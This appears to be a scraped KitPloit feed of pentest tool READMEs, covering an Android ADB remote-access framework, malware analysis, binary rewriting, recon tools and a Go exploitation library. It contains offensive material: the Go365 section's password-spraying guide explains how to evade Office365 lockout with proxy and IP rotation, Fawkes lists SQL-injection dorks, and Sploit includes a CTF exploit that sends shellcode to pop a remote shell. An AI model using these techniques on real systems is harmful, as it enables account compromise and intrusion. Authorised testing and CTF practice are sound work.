Channel: KitPloit - PenTest Tools!

Ghost Framework - An Android Post-Exploitation Framework That Exploits The Android Debug Bridge To Remotely Access An Android Device



About Ghost Framework
Ghost Framework is an Android post-exploitation framework that exploits the
Android Debug Bridge to remotely access an Android device. Ghost Framework
gives you the power and convenience of remote Android device administration.
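Under the hood this relies on the standard ADB-over-TCP workflow; a rough sketch of the manual equivalent, with a placeholder device IP, looks like this (Ghost automates and builds on these steps):

adb connect 192.168.1.20:5555   # attach to a device with ADB over TCP enabled
adb devices                     # confirm the remote device is listed
adb shell                       # drop into a shell on the device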

Getting started
Ghost installation
To install Ghost Framework, execute the following commands:

cd ghost

chmod +x install.sh

./install.sh

Ghost uninstallation
To uninstall Ghost Framework, execute the following commands:

cd ghost

chmod +x uninstall.sh

./uninstall.sh


Ghost Framework execution
To run Ghost Framework, execute the following command:

ghost


Why Ghost Framework
  • Simple and clear UX/UI.
Ghost Framework has a simple, clear interface that is easy to understand and quick to master.
  • Device shell access.
Ghost Framework can access the remote Android device's shell without using OpenSSH or other protocols.
  • Device screen control.
Ghost Framework can access the device screen and control it remotely using mouse and keyboard.


Ghost Framework disclaimer
Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



Freki - Malware Analysis Platform


 

Freki is a free and open-source malware analysis platform.


Goals
  1. Facilitate malware analysis and reverse engineering;
  2. Provide an easy-to-use REST API for different projects;
  3. Easy deployment (via Docker);
  4. Allow the addition of new features by the community.

Current features
  • Hash extraction.
  • VirusTotal API queries.
  • Static analysis of PE files (headers, sections, imports, capabilities, and strings).
  • Pattern matching with Yara.
  • Web interface and REST API.
  • User management.
  • Community comments.
  • Download samples.

Check our online documentation for more details.

Open an issue to suggest new features. All contributions are welcome.


How to get the source code

git clone https://github.com/crhenr/freki.git


Demo

Video demo: https://youtu.be/AW4afoaogt0.


Running

The easy way: Docker
  1. Install Docker and Docker Compose.
  2. Edit the .env file.
  3. If you are going to use it in production, edit freki.conf to enable HTTPS.
  4. Run docker-compose up or make (a consolidated sketch of these steps follows).
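Assuming a standard checkout, those steps roughly translate to the following (the .env values, such as API keys, are site-specific):

git clone https://github.com/crhenr/freki.git
cd freki
nano .env            # adjust the environment settings
docker-compose up    # or: make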

Other ways

If you want to use it locally (e.g., for development), please check our online documentation for more details.



PoshBot - Powershell-based Bot Framework



PoshBot is a chat bot written in PowerShell. It makes extensive use of classes introduced in PowerShell 5.0. PowerShell modules are loaded into PoshBot and instantly become available as bot commands. PoshBot currently supports connecting to Slack to provide you with awesome ChatOps goodness.


What Can PoshBot Do?

Pretty much anything you want :) No seriously. PoshBot executes functions or cmdlets from PowerShell modules. Use PoshBot to connect to servers and report status, deploy code, execute runbooks, query APIs, etc. If you can write it in PowerShell, PoshBot can execute it.


Documentation

Detailed documentation can be found at ReadTheDocs.


Building PoshBot

See Building PoshBot for documentation on how to build PoshBot from source.


Changelog

Detailed changes for each release are documented in the release notes.


[YouTube] PowerShell Summit 2018 - Invoke-ChatOps: Level up and change your culture with chat and PowerShell



Quickstart

To get started now, get a SLACK-API-TOKEN for your bot:

https://my.slack.com/services/new/bot

# Install the module from PSGallery
Install-Module -Name PoshBot -Repository PSGallery

# Import the module
Import-Module -Name PoshBot

# Create a bot configuration
$botParams = @{
    Name = 'name'
    BotAdmins = @('<SLACK-CHAT-HANDLE>')
    CommandPrefix = '!'
    LogLevel = 'Info'
    BackendConfiguration = @{
        Name = 'SlackBackend'
        Token = '<SLACK-API-TOKEN>'
    }
    AlternateCommandPrefixes = 'bender', 'hal'
}

$myBotConfig = New-PoshBotConfiguration @botParams

# Start a new instance of PoshBot interactively or in a job.
Start-PoshBot -Configuration $myBotConfig #-AsJob

Basic usage:

# Create a Slack backend
$backendConfig = @{Name = 'SlackBackend'; Token = '<SLACK-API-TOKEN>'}
$backend = New-PoshBotSlackBackend -Configuration $backendConfig

# Create a PoshBot configuration
$pbc = New-PoshBotConfiguration -BotAdmins @('<MY-SLACK-HANDLE>') -BackendConfiguration $backendConfig

# Save configuration
Save-PoshBotConfiguration -InputObject $pbc -Path .\PoshBotConfig.psd1

# Load configuration
$pbc = Get-PoshBotConfiguration -Path .\PoshBotConfig.psd1

# Create an instance of the bot
$bot = New-PoshBotInstance -Configuration $pbc -Backend $backend

# Start the bot
$bot.Start()

# Available commands
Get-Command -Module PoshBot

CommandType Name                          Version Source
----------- ----                          ------- ------
Function    Get-PoshBot                   0.12.0  poshbot
Function    Get-PoshBotConfiguration      0.12.0  poshbot
Function    Get-PoshBotStatefulData       0.12.0  poshbot
Function    New-PoshBotCardResponse       0.12.0  poshbot
Function    New-PoshBotConfiguration      0.12.0  poshbot
Function    New-PoshBotDiscordBackend     0.12.0  poshbot
Function    New-PoshBotFileUpload         0.12.0  poshbot
Function    New-PoshBotInstance           0.12.0  poshbot
Function    New-PoshBotMiddlewareHook     0.12.0  poshbot
Function    New-PoshBotScheduledTask      0.12.0  poshbot
Function    New-PoshBotSlackBackend       0.12.0  poshbot
Function    New-PoshBotTeamsBackend       0.12.0  poshbot
Function    New-PoshBotTextResponse       0.12.0  poshbot
Function    Remove-PoshBotStatefulData    0.12.0  poshbot
Function    Save-PoshBotConfiguration     0.12.0  poshbot
Function    Set-PoshBotStatefulData       0.12.0  poshbot
Function    Start-PoshBot                 0.12.0  poshbot
Function    Stop-Poshbot                  0.12.0  poshbot


E9Patch - A Powerful Static Binary Rewriting Tool



E9Patch is a powerful static binary rewriting tool for x86_64 Linux ELF binaries. E9Patch is:

  • Scalable: E9Patch can reliably rewrite large/complex binaries including web browsers (>100MB in size).
  • Compatible: The rewritten binary is a drop-in replacement of the original, with no additional dependencies.
  • Fast: E9Patch can rewrite most binaries in a few seconds.
  • Low Overheads: Both performance and memory.
  • Programmable: E9Patch is designed so that it can be easily integrated into other projects. See the E9Patch Programmer's Guide for more information.

Background

Static binary rewriting takes as input a binary file (ELF executable or shared object, e.g. a.out) and outputs a new binary file (e.g., b.out) with some patch/modification applied to it. The patched b.out can then be used as a drop-in replacement of the original a.out. Typical binary rewriting applications include instrumentation (the addition of new instructions) or patching (replacing binary code with a new version).

Static binary rewriting is notoriously difficult. One problem is that space for the new instructions must be allocated, and this typically means that existing instructions will need to be moved in order to make room. However, some of these existing instructions may also be jump targets, meaning that all jump/call instructions in the original binary will also need to be adjusted in the rewritten binary. Unfortunately, things get complicated very quickly:

  • The complete set of targets cannot be determined statically (it is an undecidable problem in the general case of indirect calls or jumps).
  • Cross-binary calls/jumps are not uncommon, for example the compare function pointer argument to libc's qsort(). Since code pointers cannot be reliably distinguished from other data in the general case, this can mean that the entire shared library dependency tree also needs to be rewritten.

Unless all jumps and calls are perfectly adjusted, the rewritten binary will likely crash or otherwise misbehave. This is why existing static binary rewriting tools tend to scale poorly.


How E9Patch is Different

E9Patch differs from other tools in that it can statically rewrite x86_64 Linux ELF binaries without modifying the set of jump targets. To do so, E9Patch uses a set of novel low-level binary rewriting techniques, such as instruction punning, padding, and eviction, that can insert or replace binary code without needing to move existing instructions. Since existing instructions are not moved, the set of jump targets remains unchanged, meaning that calls/jumps do not need to be corrected (including cross-binary calls/jumps).

E9Patch is therefore highly scalable by design, and can reliably rewrite very large binaries such as Google Chrome and Firefox (>100MB in size).

To find out more on how E9Patch works, please see our PLDI'2020 paper:


Additional Notes

The key to E9Patch's scalability is that it makes minimal assumptions about the input binary. However, E9Patch is not 100% assumption-free, and does assume:

  • The binary can be disassembled and does not use overlapping instructions. The default E9Tool frontend uses the Capstone disassembler.
  • The binary does not read from, or write to, the patched executable segments. For example, self-modifying code is not supported.

Most off-the-shelf x86_64 Linux binaries will satisfy these assumptions.

The instruction patching methodology that E9Patch uses is not guaranteed to work for every instruction. As such, the coverage of the patching may not be 100%. E9Patch will print coverage information after the rewriting process, e.g.:

    num_patched = 2766 / 2766 (100.00%)

Most applications can expect at or near 100% coverage. However, coverage can be diminished by several factors, including:

  • Patching single-byte instructions such as rets, pushes and pops. These are difficult to patch, affecting coverage.
  • Patching too many instructions.
  • Binaries with large static code or data segments that limit the space available for trampolines.

A patched binary with less than 100% coverage will still run correctly, albeit with some instructions remaining unpatched. Whether or not this is an issue depends largely on the application.


Building

Building E9Patch is very easy: simply run the build.sh script.

This should automatically build two tools:

  1. e9patch: the binary rewriter backend; and
  2. e9tool: a basic frontend for e9patch.
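For instance, from the repository root (a minimal sketch using only the script and tool names listed above):

    $ ./build.sh
    $ ls ./e9patch ./e9tool     # both tools should now exist in the repository root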

Examples

The e9patch tool is usable via the e9tool front-end.

For example, to add instruction printing instrumentation to all xor instructions in xterm, we can use the following command:

    $ ./e9tool --match 'asm=xor.*' --action print `which xterm`

This will write out a modified xterm into the file a.out.

The modified xterm can be run as per normal, but will print the assembly string of each executed xor instruction to stderr:

    $ ./a.out
xorl %ebp, %ebp
xorl %ebx, %ebx
xorl %eax, %eax
xorl %edx, %edx
xorl %edi, %edi
...

For a full list of supported options and modes, see:

    $ ./e9tool --help

More Examples

Patch all jump instructions with "empty" (a.k.a. "passthru") instrumentation:

    $ ./e9tool --match 'asm=j.*' --action passthru `which xterm`
$ ./a.out

Print all jump instructions with "print" instrumentation:

    $ ./e9tool --match 'asm=j.*' --action print `which xterm`
$ ./a.out

Same as above, but use "Intel" syntax:

    $ ./e9tool --match 'asm=j.*' --action print `which xterm` --syntax=intel
$ ./a.out

Patch all jump instructions with a call to an empty function:

    $ ./e9compile.sh examples/nop.c
$ ./e9tool --match 'asm=j.*' --action 'call[naked] entry@nop' `which xterm`
$ ./a.out

Patch all jump instructions with instruction count instrumentation:

    $ ./e9compile.sh examples/counter.c
$ ./e9tool --match 'asm=j.*' --action 'call entry@counter' `which xterm`
$ FREQ=10000 ./a.out

Patch all jump instructions with pretty print instrumentation:

    $ ./e9compile.sh examples/print.c
$ ./e9tool --match 'asm=j.*' --action 'call entry(addr,asmStr,instr,instrLen)@print' `which xterm`
$ ./a.out

Patch all jump instructions with "delay" instrumentation to slow the program down:

    $ ./e9compile.sh examples/delay.c
$ ./e9tool --match 'asm=j.*' --action 'call entry@delay' `which xterm`
$ DELAY=100000 ./a.out

Patch all jump instructions in Google Chrome with empty instrumentation:

    $ mkdir -p chrome
$ for FILE in /opt/google/chrome/*; do ln -sf $FILE chrome/; done
$ rm chrome/chrome
$ ./e9tool --match 'asm=j.*' --action passthru /opt/google/chrome/chrome -c 4 --start=ChromeMain -o chrome/chrome
$ cd chrome
$ ./chrome

Patch all jump instructions in Google Chrome with instruction count instrumentation:

    $ ./e9compile.sh examples/counter.c
$ mkdir -p chrome
$ for FILE in /opt/google/chrome/*; do ln -sf $FILE chrome/; done
$ rm chrome/chrome
$ ./e9tool --match 'asm=j.*' --action 'call entry@counter' /opt/google/chrome/chrome -c 4 --start=ChromeMain -o chrome/chrome
$ cd chrome
$ FREQ=10000000 ./chrome

Notes:

  • Tested for XTerm(322)
  • Tested for Google Chrome version 80.0.3987.132 (Official Build) (64-bit).

Projects

Some other projects that use E9Patch include:

  • E9AFL: Automatically insert AFL instrumentation into binaries.
  • E9Syscall: System call interception using static binary rewriting of libc.so.

Documentation

If you just want to test E9Patch out, then please try the above examples.

E9Patch is a low-level tool that is designed to be integrable into other projects. To find out more, please see the following documentation:


Bugs

E9Patch should be considered alpha-quality software. Bugs can be reported here:


Versions

The released version is an improved version of the original prototype evaluated in the paper. The implementation of the Physical Page Grouping space optimization has been improved.


Acknowledgements

This work was partially supported by the National Satellite of Excellence in Trustworthy Software Systems, funded by National Research Foundation (NRF) Singapore under the National Cybersecurity R&D (NCR) programme.



Go365 - An Office365 User Attack Tool



Go365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use. When queried with an email address and password, the endpoint responds with an Azure AD Authentication and Authorization code. This code is then processed by Go365 and the result is printed to screen or an output file.

* User enumeration is performed in conjunction with a password guess attempt. Thus, there is no specific flag or functionality to perform only user enumeration. Instead, conduct your first password guessing attack, then parse the results for valid users.


Read these three bullets!
  • This tool might not work on all domains that utilize o365. Tests show that it works with most federated domains. Some domains will only report valid users even if a valid password is also provided. Your results may vary!
  • The domains this tool was tested on showed that it did not actually lock out accounts after multiple password failures. Your results may vary!
  • This tool is intended to be used by security professionals that are authorized to "attack" the target organization's o365 instance.

Obtaining

Option 1

Download a pre-compiled binary for your OS HERE.


Option 2

Download the source and compile locally.

  1. Install Go.
  2. Go get some packages:
go get github.com/beevik/etree
go get github.com/fatih/color
go get golang.org/x/net/proxy
  3. Clone the repo.
  4. Navigate to the repo and compile ya dingus:
go build Go365.go
  5. Run the resulting binary and enjoy :) (a consolidated sketch of these steps follows)
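Taken together, and using a placeholder for the repository URL (listed on the project page), the local build might look like this:

go get github.com/beevik/etree
go get github.com/fatih/color
go get golang.org/x/net/proxy
git clone <Go365 repository URL>
cd Go365            # directory name assumed from the repository name
go build Go365.go
./Go365 -h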

Usage
$ ./Go365 -h

██████  ██████  ██████  ██████
██             ██ ██       ██
██  ███  ████   █████  ███████  ██████
██  ██ ██  ██      ██ ██    ██      ██
  ██████    ████  ██████   ██████  ██████

Version: 0.2
Authors: h0useh3ad, paveway3, S4R1N, EatonChips

This tool is currently in development.

Usage:
./Go365 -ul <userlist> -p <password> -d <domain> [OPTIONS]
Options:
-h, Show this stuff

Required:
-u string Username to use
- Username with or without "@domain.com"
(-u legit.user)
-ul <file> Username list to use
- File should contain one username per line
- Usernames can have "@domain.com"
- If no domain is specified, the -d domain is used
( -ul ./usernamelist.txt)
-p <string> Password to attempt
- Enclose in single quotes if it contains special characters
(-p password123 OR -p 'p@s$w0|2d')
-pl <file> Password list to use
- File should contain one password per line
- Must be used with -delay
(-pl ./passwordlist.txt)
-up <file> Userpass list to use
- One username and password separated by a ":" per line
- Be careful of duplicate usernames!
(-up ./userpasslist.txt)
-d <string> Domain to test
(-d testdomain.com)

Optional:
-w <int> Time to wait between attempts in seconds.
- Default: 1 second. 5 seconds recommended.
(-w 10)
-delay <int> Delay (in seconds) between sprays when using a password list.
- Default: 10 minutes. 60 minutes (3600 seconds) recommended.
(-delay 600)
-o <string> Output file to write to
- Will append if file exists, otherwise a file is created
(-o ./output.out)
-proxy <string> Single proxy server to use
- IP address and Port separated by a ":"
- Has only been tested using SSH SOCKS5 proxies
(-proxy 127.0.0.1:1080)
-proxyfile <string> A file with a list of proxy servers to use
- IP address and Port separated by a ":" on each line
- Randomly selects a proxy server to use before each request
- Has only been tested using SSH SOCKS5 proxies
(-proxyfile ./proxyfile.txt)
-url <string> Endpoint to send requests to
- Amazon API Gateway 'Invoke URL'
(-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login)
-debug Debug mode.
- Print xml response

Examples
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5
./Go365 -up ./userpass_list.txt -d pwnthisfakedomain.com -w 5 -o Go365output.txt
./Go365 -u legituser@pwnthisfakedomain.com -p 'coolpasswordbro!123' -w 5 -o Go365output.txt -proxy 127.0.0.1:1080
./Go365 -u legituser -pl ./pass_list.txt -delay 1800 -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxyfile ./proxyfile.txt
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login

Account Locked Out! (Domain Defenses)

Protip: You probably aren't actually locking out accounts.

After a number of queries against a target domain, results might start reporting that accounts are locked out.

Once this defense is triggered, user enumeration becomes unreliable since requests for valid and invalid users will randomly report that their accounts have been locked out.

...
[-] User not found: test.user90@pwnthisfakedomain.com
[-] User not found: test.user91@pwnthisfakedomain.com
[-] Valid user, but invalid password: test.user92@pwnthisfakedomain.com
[!] Account Locked Out: real.user1@pwnthisfakedomain.com
[-] Valid user, but invalid password: test.user93@pwnthisfakedomain.com
[!] Account Locked Out: valid.user94@pwnthisfakedomain.com
[!] Account Locked Out: jane.smith@pwnthisfakedomain.com
[-] Valid user, but invalid password: real.user95@pwnthisfakedomain.com
[-] Valid user, but invalid password: fake.user96@pwnthisfakedomain.com
[!] Account Locked Out: valid.smith@pwnthisfakedomain.com
...

This is a defensive mechanism triggered by the number of valid user queries against the target domain within a certain period of time. The number of attempts and the period of time will vary depending on the target domain since the thresholds can be customized by the target organization.


Countering Defenses

Wait time

The defensive mechanism is time and IP address based. Go365 provides options to include a wait time between requests and proxy options to distribute the source of the requests. To circumvent the defensive mechanisms on your target domain, use a long wait time and multiple proxy servers.

A wait time of AT LEAST 15 seconds is recommended. -w 15


SOCKS5 Proxies

If you still get "account locked out" responses, start proxying your requests. Proxy options have only been tested on SSH SOCKS5 dynamic proxies (ssh -D <port> user@proxyserver)

Create a bunch of SOCKS5 proxies on DO or AWS or Vultr or whatever and make a file that looks like this:

127.0.0.1:8081
127.0.0.1:8082
127.0.0.1:8083
127.0.0.1:8084
127.0.0.1:8085
127.0.0.1:8086
...

The tool will randomly iterate through the provided proxy servers and wait for the specified amount of time between requests.

-w 15 -proxyfile ./proxies.txt
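Each entry in that file can be a plain SSH dynamic port forward started in the background, for example (users and hosts are placeholders):

ssh -f -N -D 8081 user@vps1.example.com
ssh -f -N -D 8082 user@vps2.example.com
ssh -f -N -D 8083 user@vps3.example.com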


Amazon API Gateway

Additionally, an endpoint URL may be specified so this tool can interface with Amazon API Gateway. Set up a gateway to point to the https://login.microsoftonline.com/rst2.srf endpoint, then set the -url parameter to the provided Invoke URL. Your IP should be rotated with each request.

-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login



Scilla - Information Gathering Tool (DNS/Subdomain/Port Enumeration)



Information Gathering Tool - Dns/Subdomain/Port Enumeration


Installation

First of all, clone the repo locally

git clone https://github.com/edoardottt/scilla.git

Scilla has external dependencies, so they need to be pulled in:

go get

Installation support is a work in progress; see the open issue.

For now, you can run it from inside the scilla folder with go run scilla.go ...

Too late: see this.

Then use the build scripts (a consolidated sketch follows the list below):

  • make windows builds 32- and 64-bit binaries for Windows, and writes them to the build subfolder.

  • make linux builds 32- and 64-bit binaries for Linux, and writes them to the build subfolder.

  • make unlinux removes the built binaries.

  • make fmt runs the Go formatter.

  • make update runs the update target.

  • make remod runs the remod target.

  • make test runs the tests.

  • make clean clears out the build subfolder.
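For example, a typical Linux setup using the pieces above might look like this (binary names under the build subfolder may vary):

git clone https://github.com/edoardottt/scilla.git
cd scilla
go get
make linux          # binaries are written to the build subfolder
go run scilla.go help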


Get Started

scilla help prints the help in the command line.

usage: scilla [subcommand] { options }

Available subcommands:
- dns { -target <target (URL)> REQUIRED}
- subdomain { -target <target (URL)> REQUIRED}
- port { [-p <start-end>] -target <target (URL/IP)> REQUIRED}
- report { [-p <start-end>] -target <target (URL/IP)> REQUIRED}
- help

Examples
  • DNS enumeration: scilla dns -target target.domain

  • Subdomain enumeration: scilla subdomain -target target.domain

  • Port enumeration:

    • Default (all ports, so 1-65535) scilla port -target target.domain

    • Specifying ports range scilla port -p 20-90 -target target.domain

    • Specifying starting port (until the last one) scilla port -p 20- -target target.domain

    • Specifying ending port (from the first one) scilla port -p -90 -target target.domain

    • Specifying single port scilla port -p 80 -target target.domain

  • Full report:

    • Default (all ports, so 1-65535) scilla report -target target.domain

    • Specifying ports range scilla report -p 20-90 -target target.domain

    • Specifying starting port (until the last one) scilla report -p 20- -target target.domain

    • Specifying ending port (from the first one) scilla report -p -90 -target target.domain

    • Specifying single port scilla report -p 80 -target target.domain



Bento - A Minimal Fedora-Based Container For Penetration Tests And CTF With The Sweet Addition Of GUI Applications



A bento (弁当, bentō) is a single-portion take-out or home-packed meal of Japanese origin.

Bento Toolkit is a simple and minimal docker container for penetration testers and CTF players.

It has the portability of Docker with the addition of X, so you can also run GUI applications (like Burp).


Prerequisites

To run bento you need Docker and an Xorg server on your host machine. On Windows you can use vcxsrv, xming, or cygwin.

We tested this config with vcxsrv and cygwin.

  • vcxsrv: just start XLaunch and follow the setup
  • cygwin: you have to install xorg first, then start XLaunch.

Installation
  • git clone https://github.com/higatowa/bento && cd ./bento
  • generate keypair and put authorized_keys, containing your public key, in ./keys.
  • docker build -t bento .
  • Since we need to forward X to our machine we need first to get its ip, and then to execute: docker run --cap-add=NET_ADMIN --device /dev/net/tun --sysctl net.ipv6.conf.all.disable_ipv6=0 -p 22:22 -d bento
  • Connect via ssh to the docker machine and forward port 6000 (Xorg) with ssh -R 6000:localhost:6000 -L 8080:localhost:8080 tamago@bentoip
  • On first login you will be asked to change the password. (A consolidated sketch of these steps follows.)
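Putting the steps together, a minimal end-to-end session might look like this (the key type/path, image tag, and bentoip are placeholders):

git clone https://github.com/higatowa/bento && cd ./bento
ssh-keygen -t ed25519 -f ./bento_key        # generate a keypair
cp ./bento_key.pub ./keys/authorized_keys   # public key goes into ./keys
docker build -t bento .
docker run --cap-add=NET_ADMIN --device /dev/net/tun --sysctl net.ipv6.conf.all.disable_ipv6=0 -p 22:22 -d bento
ssh -R 6000:localhost:6000 -L 8080:localhost:8080 tamago@bentoip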

For GUI tools just run them from the terminal:



 

Current tools and utilities

We don't like bloated distros, so we are keeping this container as minimal as possible, adding only tools useful for web and infrastructure PT and CTF. But remember, we are always open to suggestions.

Here is a list of tools and utilities: burp suite, gobuster, seclist, odat, impacket, sqlmap, sqlplus, mysql-client, openvpn, bytecode-viewer, ghidra.



Bheem - Simple Collection Of Small Bash-Scripts Which Runs Iteratively To Carry Out Various Tools And Recon Process



Project Bheem is a simple collection of small bash scripts that run iteratively to carry out various tools and recon processes and store the output in an organized way. This project was initially created to automate recon for personal use and was never meant to be public, as there is nothing fancy about it, but due to requests from the community, Project Bheem is now public.
Please feel free to improve it in any way you can. There is no secret sauce involved; it's just a set of commands and existing tools written as bash scripts for simple recon automation.

Project Bheem supports the recon approach from @harshbothra_'s Scope Based Recon Methodology. Currently the tool supports performing recon for:

  1. Small Scope (single URLs in scope): performs limited recon; useful when only a few URLs are provided in scope
  2. Medium Scope (*.target.com in scope): performs recon to enumerate more assets and give you more options to attack
  3. Large Scope (everything in scope): performs almost every possible recon vector, from subdomain enumeration to fuzzing

A few features like port scanning might not be working in the current build, and some newly released tools might also be missing. We are working on upgrading the tool, but feel free to fork, upgrade, and make a pull request (ensure the tool does not break).


A big thanks to "Kathan Patel" for restructuring Project Bheem to Support Scope Based Recon.

Pre-Requisite
  1. Make sure the latest version of Go is installed and paths are correctly set.

Installation
  1. Clone the repository.
  2. Run the following script to install the necessary tools: sh install.sh
  3. The arsenal directory contains a set of small scripts used to automate Bheem. Give executable permissions to the scripts in this directory.
  4. Navigate to the ~/arsenal directory and simply run the following command to see all the options supported by Bheem:

./Bheem.sh -h

  5. To use it on a VPS for performing recon on a larger set of targets, run the following command:

screen -S <screen_name> ~/arsenal/Bheem.sh -h

  6. This will keep Bheem running even if the SSH connection is terminated or you turn off your local machine.

Sample Usage
  1. Small Scope Recon : Bheem -t targetfile -S
  2. Medium Scope Recon : Bheem -t targetfile -M
  3. Large Scope Recon : Bheem -t targetfile -L

targetfile contains list of domains to perform Recon. For example: targettest.com
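For example, a medium-scope run against a single root domain might look like this (paths follow the installation steps above; the domain is a placeholder):

echo "targettest.com" > targetfile
~/arsenal/Bheem.sh -t targetfile -M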


Side Notes
  1. If you don't want to use a specific module, just comment it out and it won't be used.

Tools Used
  1. Nuclei
  2. HTTPX
  3. GF & GF-Patterns
  4. Secret Finder
  5. Heartbleed Oneliner
  6. AMASS
  7. Subfinder
  8. Assetfinder
  9. JSScan
  10. FavFreak
  11. Waybackurls
  12. Gau
  13. Parallel
  14. asnip
  15. dirsearch
  16. gowitness
  17. subjack
  18. CORS Scanner
  19. git-hound
  20. Shuffledns
  21. Massdns

~ Other one-liners and tools are to be added.


PR Notes
  1. If there are any Go version/path related issues, please do not create a PR for them.
  2. Please create a PR for feature requests.
  3. If there is any missing part in install.sh, please create a PR for it.
  4. For tool-specific issues, such as the installation of a tool used by Bheem not being successful, please do not create a PR; such issues should be raised with the specific tool's owner.

Future Plans/Under Development

  1. Adding Directory Enumeration
  2. Adding Subdomain Bruteforcing
  3. Adding HTTP Desync Scanner
  4. Adding Vulnerable Software & Exploit Suggester
  5. Adding Oneliner Scanner for CORS, CRLF & Other Vectors
  6. Adding Visual Recon


Special Thanks

Every single application security community member and tool developers. Special Thanks to:

  1. Project Discovery (Httpx, Subfinder, chaos, nuclei)
  2. OWASP (Amass)
  3. Tomnomnom (Assetfinder, Waybackurls, GF)
  4. Devansh (FavFreak)
  5. Imran (Heartbleed oneliner)
  6. M4ll0k (Secret Finder)
  7. lc (gau)
  8. tillson (git-hound)
  9. ffuf (ffuf)
  10. sensepost (gowitness)
  11. defparam (smuggler)
  12. haccer (subjack)
  13. crt.sh (YashGoti)

Please feel free to contribute.



Fawkes - Tool To Search For Targets Vulnerable To SQL Injection (Performs The Search Using Google Search Engine)



Fawkes is a tool to search for targets vulnerable to SQL Injection. Performs the search using Google search engine.


Options
    -q, --query      - Dork that will be used in the search engine.
    -r, --results    - Number of results brought by the search engine.
    -s, --start-page - Home page of search results.
    -t, --timeout    - Timeout of requests.
    -v, --verbose    - Enable verbosity.

Examples:
python3 fawkes.py --query 'noticias.php?id=10' --timeout 3 --verbose
python3 fawkes.py --query 'admin.php?id=1' --timeout 3 --verbose


Sploit - Go Package That Aids In Binary Analysis And Exploitation



Sploit is a Go package that aids in binary analysis and exploitation. The motivating factor behind the development of sploit is to be able to have a well designed API with functionality that rivals some of the more common Python exploit development frameworks while taking advantage of the Go programming language. Excellent cross-compiler support, goroutines, powerful crypto libraries, and static typing are just a few of the reasons for choosing Go.

This project is inspired by pwntools and other awesome projects. It is still early in development. Expect this project to be focused heavily on shellcoding, binary patching, ROP stack construction, and general binary analysis.


Solution for a CTF Challenge
package main

import (
    sp "github.com/zznop/sploit"
)

var arch = &sp.Processor{
    Architecture: sp.ArchI386,
    Endian:       sp.LittleEndian,
}

var scInstrs = `mov al, 0xb /* __NR_execve */
sub esp, 0x30 /* Get pointer to /bin/sh (see below) */
mov ebx, esp /* filename (/bin/sh) */
xor ecx, ecx /* argv (NULL) */
xor edx, edx /* envp (NULL) */
int 0x80`

func main() {
    shellcode, _ := sp.Asm(arch, scInstrs)
    r, _ := sp.NewRemote("tcp", "some.pwnable.on.the.interwebz:10800")
    defer r.Close()
    r.RecvUntil([]byte("HELLO:"), true)

    // Leak a stack address
    r.Send(append([]byte("/bin/sh\x00AAAAAAAAAAAA"), sp.PackUint32LE(0x08048087)...))
    resp, _ := r.RecvN(20)
    leakAddr := sp.UnpackUint32LE(resp[0:4])

    // Pop a shell
    junk := make([]byte, 20-len(shellcode))
    junk = append(junk, sp.PackUint32LE(leakAddr-4)...)
    r.Send(append(shellcode, junk...))
    r.Interactive()
}

Compiling Assembly to Machine Code
package main

import (
    "encoding/hex"
    "fmt"

    "github.com/zznop/sploit"
)

func main() {
    instrs := "mov rcx, r12\n" +
        "mov rdx, r13\n" +
        "mov r8, 0x1f\n" +
        "xor r9, r9\n" +
        "sub rsp, 0x8\n" +
        "mov qword [rsp+0x20], rax\n"

    arch := &sploit.Processor{
        Architecture: sploit.ArchX8664,
        Endian:       sploit.LittleEndian,
    }

    opcode, _ := sploit.Asm(arch, instrs)
    fmt.Printf("Opcode bytes:\n%s\n", hex.Dump(opcode))
}
$ ./assemble_example
Opcode bytes:
00000000 4c 89 e1 4c 89 ea 49 c7 c0 1f 00 00 00 4d 31 c9 |L..L..I......M1.|
00000010 48 83 ec 08 48 89 44 24 28 |H...H.D$(|

Disassembling Code in an ELF Executable
package main

import (
    "fmt"

    "github.com/zznop/sploit"
)

var program = "../test/prog1.x86_64"

func main() {
    elf, _ := sploit.NewELF(program)
    vaddr := uint64(0x1135)
    count := 34
    fmt.Printf("Disassembling %v bytes at vaddr:%08x\n", count, vaddr)
    disasm, _ := elf.Disasm(vaddr, count)
    fmt.Print(disasm)
}
$ ./disassemble_example
Disassembling 34 bytes at vaddr:00001135
00001135: push rbp
00001136: mov rbp, rsp
00001139: sub rsp, 0x10
0000113d: mov dword ptr [rbp - 4], edi
00001140: mov qword ptr [rbp - 0x10], rsi
00001144: lea rdi, [rip + 0xeb9]
0000114b: call 0x1030
00001150: mov eax, 0
00001155: leave
00001156: ret

Querying and Filtering ROP Gadgets
package main

import (
    "github.com/zznop/sploit"
)

var program = "../test/prog1.x86_64"

func main() {
    elf, _ := sploit.NewELF(program)
    rop, _ := elf.ROP()

    matched, _ := rop.InstrSearch("pop rbp")
    matched.Dump()
}
0000111f: pop rbp ; ret
0000111d: add byte ptr [rcx], al ; pop rbp ; ret
00001118: mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
00001113: call 0x1080 ; mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
000011b7: pop rbp ; pop r14 ; pop r15 ; ret
000011b3: pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011b2: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011af: add esp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011ae: add rsp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
...

Dependencies

Some of Sploit's functionality relies on external dependencies. For instance, Sploit uses GCC's GAS assembler to compile assembly code and capstone to disassemble compiled code as part of the API exposed by asm.go.

Install capstone:

git clone https://github.com/aquynh/capstone.git --branch 4.0.2 --single-branch
cd capstone
make
sudo make install

